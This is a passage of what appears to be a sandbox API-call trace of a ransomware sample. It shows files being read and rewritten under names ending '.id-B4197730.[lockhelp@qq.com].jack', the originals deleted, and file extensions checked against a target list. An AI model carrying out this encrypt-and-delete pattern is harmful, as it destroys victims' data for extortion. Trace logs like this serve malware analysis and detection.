[0197.848] CloseHandle (hObject=0x420) returned 1 [0197.850] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.850] SetEndOfFile (hFile=0x3f0) returned 1 [0197.851] CloseHandle (hObject=0x3f0) returned 1 [0197.851] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.851] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 1 [0197.851] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString=".doc") returned 4 [0197.852] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString=".docx") returned 5 [0197.852] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.852] lstrlenW (lpString=".pdf") returned 4 [0197.852] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString=".xls") returned 4 [0197.852] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString=".xlsx") returned 5 [0197.852] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.852] lstrlenW (lpString=".ppt") returned 4 [0197.852] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString=".zip") returned 4 [0197.852] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.852] lstrlenW (lpString=".rar") returned 4 [0197.852] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString=".bz2") returned 4 [0197.852] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString=".7z") returned 3 [0197.852] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString=".dbf") returned 4 [0197.852] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString=".1cd") returned 4 [0197.852] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString=".jpg") returned 4 [0197.852] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.852] lstrlenW (lpString=".doc") returned 4 [0197.852] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.852] lstrlenW (lpString=".docx") returned 5 [0197.853] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.853] lstrlenW (lpString=".pdf") returned 4 [0197.853] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString=".xls") returned 4 [0197.853] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString=".xlsx") returned 5 [0197.853] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.853] lstrlenW (lpString=".ppt") returned 4 [0197.853] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.853] lstrlenW (lpString=".zip") returned 4 [0197.853] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.853] lstrlenW (lpString=".rar") returned 4 [0197.853] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString=".bz2") returned 4 [0197.853] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString=".7z") returned 3 [0197.853] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.853] lstrlenW (lpString=".dbf") returned 4 [0197.853] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.853] lstrlenW (lpString=".1cd") returned 4 [0197.853] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0197.853] lstrlenW (lpString=".jpg") returned 4 [0197.853] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.853] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.853] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.853] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.859] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=81482) returned 1 [0197.859] CloseHandle (hObject=0x420) returned 1 [0197.859] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 0x80 [0197.859] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.860] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.860] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0197.861] GetLastError () returned 0x0 [0197.861] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x13e4a, lpOverlapped=0x0) returned 1 [0197.919] WriteFile (in: hFile=0x3b8, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e50, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e50, lpOverlapped=0x0) returned 1 [0197.921] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.921] WriteFile (in: hFile=0x3b8, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.921] SetEndOfFile (hFile=0x3b8) returned 1 [0197.922] CloseHandle (hObject=0x3b8) returned 1 [0197.924] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.924] SetEndOfFile (hFile=0x3f4) returned 1 [0197.926] CloseHandle (hObject=0x3f4) returned 1 [0197.926] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.926] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 1 [0197.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.927] lstrlenW (lpString=".doc") returned 4 [0197.927] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.927] lstrlenW (lpString=".docx") returned 5 [0197.927] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.927] lstrlenW (lpString=".pdf") returned 4 [0197.927] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.927] lstrlenW (lpString=".xls") returned 4 [0197.927] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.927] lstrlenW (lpString=".xlsx") returned 5 [0197.927] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.927] lstrlenW (lpString=".ppt") returned 4 [0197.927] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.927] lstrlenW (lpString=".zip") returned 4 [0197.927] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.927] lstrlenW (lpString=".rar") returned 4 [0197.927] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.927] lstrlenW (lpString=".bz2") returned 4 [0197.927] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.927] lstrlenW (lpString=".7z") returned 3 [0197.927] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.928] lstrlenW (lpString=".dbf") returned 4 [0197.928] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.928] lstrlenW (lpString=".1cd") returned 4 [0197.928] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.928] lstrlenW (lpString=".jpg") returned 4 [0197.928] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.928] lstrlenW (lpString=".doc") returned 4 [0197.928] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString=".docx") returned 5 [0197.928] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.928] lstrlenW (lpString=".pdf") returned 4 [0197.928] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString=".xls") returned 4 [0197.928] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString=".xlsx") returned 5 [0197.928] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.928] lstrlenW (lpString=".ppt") returned 4 [0197.928] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.928] lstrlenW (lpString=".zip") returned 4 [0197.928] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.928] lstrlenW (lpString=".rar") returned 4 [0197.928] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.929] lstrlenW (lpString=".bz2") returned 4 [0197.929] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.929] lstrlenW (lpString=".7z") returned 3 [0197.929] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.929] lstrlenW (lpString=".dbf") returned 4 [0197.929] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.929] lstrlenW (lpString=".1cd") returned 4 [0197.929] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0197.929] lstrlenW (lpString=".jpg") returned 4 [0197.929] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.929] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.929] lstrlenW (lpString="eula.rtf") returned 8 [0197.929] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.929] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3859) returned 1 [0197.929] CloseHandle (hObject=0x3f4) returned 1 [0197.930] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 0x80 [0197.930] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.930] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.930] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.930] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.930] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0197.930] GetLastError () returned 0x0 [0197.930] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xf13, lpOverlapped=0x0) returned 1 [0197.945] WriteFile (in: hFile=0x3b8, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf20, lpOverlapped=0x0) returned 1 [0197.946] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.946] WriteFile (in: hFile=0x3b8, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.946] SetEndOfFile (hFile=0x3b8) returned 1 [0197.946] CloseHandle (hObject=0x3b8) returned 1 [0197.949] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.949] SetEndOfFile (hFile=0x3f4) returned 1 [0197.950] CloseHandle (hObject=0x3f4) returned 1 [0197.950] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.950] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 1 [0197.951] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.951] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.951] lstrlenW (lpString=".doc") returned 4 [0197.951] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.951] lstrlenW (lpString=".docx") returned 5 [0197.951] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.951] lstrlenW (lpString=".pdf") returned 4 [0197.951] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.951] lstrlenW (lpString=".xls") returned 4 [0197.951] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.951] lstrlenW (lpString=".xlsx") returned 5 [0197.951] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.951] lstrlenW (lpString=".ppt") returned 4 [0197.951] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.951] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.951] lstrlenW (lpString=".zip") returned 4 [0197.951] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.951] lstrlenW (lpString=".rar") returned 4 [0197.951] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.951] lstrlenW (lpString=".bz2") returned 4 [0197.951] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.951] lstrlenW (lpString=".7z") returned 3 [0197.951] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.951] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.952] lstrlenW (lpString=".dbf") returned 4 [0197.952] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.952] lstrlenW (lpString=".1cd") returned 4 [0197.952] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.952] lstrlenW (lpString=".jpg") returned 4 [0197.952] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.952] lstrlenW (lpString=".doc") returned 4 [0197.952] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString=".docx") returned 5 [0197.952] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.952] lstrlenW (lpString=".pdf") returned 4 [0197.952] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString=".xls") returned 4 [0197.952] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.952] lstrlenW (lpString=".xlsx") returned 5 [0197.952] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.952] lstrlenW (lpString=".ppt") returned 4 [0197.952] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.952] lstrlenW (lpString=".zip") returned 4 [0197.952] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.952] lstrlenW (lpString=".rar") returned 4 [0197.952] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.952] lstrlenW (lpString=".bz2") returned 4 [0197.952] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.953] lstrlenW (lpString=".7z") returned 3 [0197.953] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.953] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.953] lstrlenW (lpString=".dbf") returned 4 [0197.953] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.953] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.953] lstrlenW (lpString=".1cd") returned 4 [0197.953] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.953] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0197.953] lstrlenW (lpString=".jpg") returned 4 [0197.953] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.953] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.953] lstrlenW (lpString="eula.rtf") returned 8 [0197.953] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.953] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=5827) returned 1 [0197.953] CloseHandle (hObject=0x3f4) returned 1 [0197.954] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 0x80 [0197.954] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.954] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.954] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.954] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.954] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0197.954] GetLastError () returned 0x0 [0197.954] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x16c3, lpOverlapped=0x0) returned 1 [0198.013] WriteFile (in: hFile=0x3b8, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x16d0, lpOverlapped=0x0) returned 1 [0198.014] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.014] WriteFile (in: hFile=0x3b8, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0198.014] SetEndOfFile (hFile=0x3b8) returned 1 [0198.014] CloseHandle (hObject=0x3b8) returned 1 [0198.017] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.017] SetEndOfFile (hFile=0x3f4) returned 1 [0198.018] CloseHandle (hObject=0x3f4) returned 1 [0198.018] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.018] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 1 [0198.019] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.019] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.019] lstrlenW (lpString=".doc") returned 4 [0198.019] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.019] lstrlenW (lpString=".docx") returned 5 [0198.019] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.019] lstrlenW (lpString=".pdf") returned 4 [0198.019] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.019] lstrlenW (lpString=".xls") returned 4 [0198.019] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.019] lstrlenW (lpString=".xlsx") returned 5 [0198.019] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.019] lstrlenW (lpString=".ppt") returned 4 [0198.019] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.019] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.019] lstrlenW (lpString=".zip") returned 4 [0198.019] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.019] lstrlenW (lpString=".rar") returned 4 [0198.019] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.019] lstrlenW (lpString=".bz2") returned 4 [0198.019] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.019] lstrlenW (lpString=".7z") returned 3 [0198.019] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.020] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.020] lstrlenW (lpString=".dbf") returned 4 [0198.020] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.020] lstrlenW (lpString=".1cd") returned 4 [0198.020] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.020] lstrlenW (lpString=".jpg") returned 4 [0198.020] lstrcmpiW 